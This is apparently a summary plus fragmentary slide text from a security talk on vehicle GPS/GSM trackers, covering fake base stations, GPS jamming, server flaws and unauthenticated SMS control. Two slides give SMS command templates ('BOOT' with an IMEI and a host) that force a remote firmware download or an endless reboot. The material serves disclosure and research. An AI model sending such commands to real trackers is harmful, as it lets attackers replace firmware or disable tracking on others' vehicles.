The document discusses security vulnerabilities in vehicle tracking devices, including:
1. Fake base transceiver stations could intercept GSM communications and spoof the device's location.
2. GPS jamming could interfere with location tracking.
3. Server-side vulnerabilities like those in the OWASP top 10 could allow unauthorized access.
4. Devices can be reconfigured or have their firmware updated remotely via SMS or GPRS without authentication, allowing man-in-the-middle attacks or denial of service.
14. GPS ant.
Mic/speaker
GPS
GSM/GPRS SIM ARM
RS-232 Power/peripheral
15. How to interact with?
RS-232 – configuration,
firmware update
SMS – configuration,
data exchange
GPRS – data exchange,
configuration,
firmware update
Voice call – just for voice calling =)
20. Firmware update through SMS
• Just sent SMS:
BOOT <IMEI> <APN setting> <ip:port> <filename>
…and device try to load ip:portfilename and
update own firmware
Without any authentication!
21. DoS through SMS
• Just sent SMS:
BOOT <IMEI>
…and device will be reboot in infinity updater
loop